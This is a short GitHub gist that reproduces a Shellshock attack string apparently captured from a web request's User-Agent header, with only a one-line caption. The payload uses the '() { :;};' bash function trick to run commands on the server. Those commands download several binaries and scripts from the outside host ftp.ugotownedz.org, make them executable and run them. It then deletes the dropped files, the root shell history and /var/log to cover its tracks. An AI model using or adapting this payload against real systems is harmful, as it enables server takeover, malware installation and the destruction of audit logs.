Skip to content

Instantly share code, notes, and snippets.

@jschwietert
Last active August 10, 2016 19:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save jschwietert/05d93c560c9c855125410065c16fcc72 to your computer and use it in GitHub Desktop.
Save jschwietert/05d93c560c9c855125410065c16fcc72 to your computer and use it in GitHub Desktop.
A nice little User-Agent header script I found...
() { :;};
/bin/bash -c \x22mkdir /var/.udp;
wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;
wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;
curl -o /var/.udp/Xorg ftp://ftp.ugotownedz.org/Xorg;GET ftp://ftp.ugotownedz.org/Xorg;fetch ftp://ftp.ugotownedz.org/Xorg;
lwp-download ftp://ftp.ugotownedz.org/Xorg;
chmod +x /var/.udp/Xorg;
chmod +x Xorg;
perl /var/.udp/Xorg;
rm -rf /var/.udp/Xorg*;
rm -rf Xorg*;
wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;
wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;
curl -o /tmp/upfile2.sh ftp://ftp.ugotownedz.org/upfile2.sh;GET ftp://ftp.ugotownedz.org/upfile2.sh;fetch ftp://ftp.ugotownedz.org/upfile2.sh;
lwp-download ftp://ftp.ugotownedz.org/upfile2.sh;
chmod +x /tmp/upfile2.sh;
chmod +x upfile2.sh;sh /tmp/upfile2.sh ftp.ugotownedz.org ;
rm -rf /tmp/upfile2.sh*;
rm -rf upfile2.sh*;
wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;
wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;
curl -o /tmp/decriss2 ftp://ftp.ugotownedz.org/decriss2;GET ftp://ftp.ugotownedz.org/decriss2;fetch ftp://ftp.ugotownedz.org/decriss2;
lwp-download ftp://ftp.ugotownedz.org/decriss2;
chmod +x /tmp/decriss2;
chmod +x decriss2;
sh /tmp/decriss2 ;
wget ftp://ftp.ugotownedz.org/update -O /tmp/update;
sh /tmp/update ; rm -rf /tmp/update;
rm -rf /tmp/decriss2*;
rm -rf decriss2*;
rm -rf /root/.bash_history;
rm -rf /var/log/*\x22
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment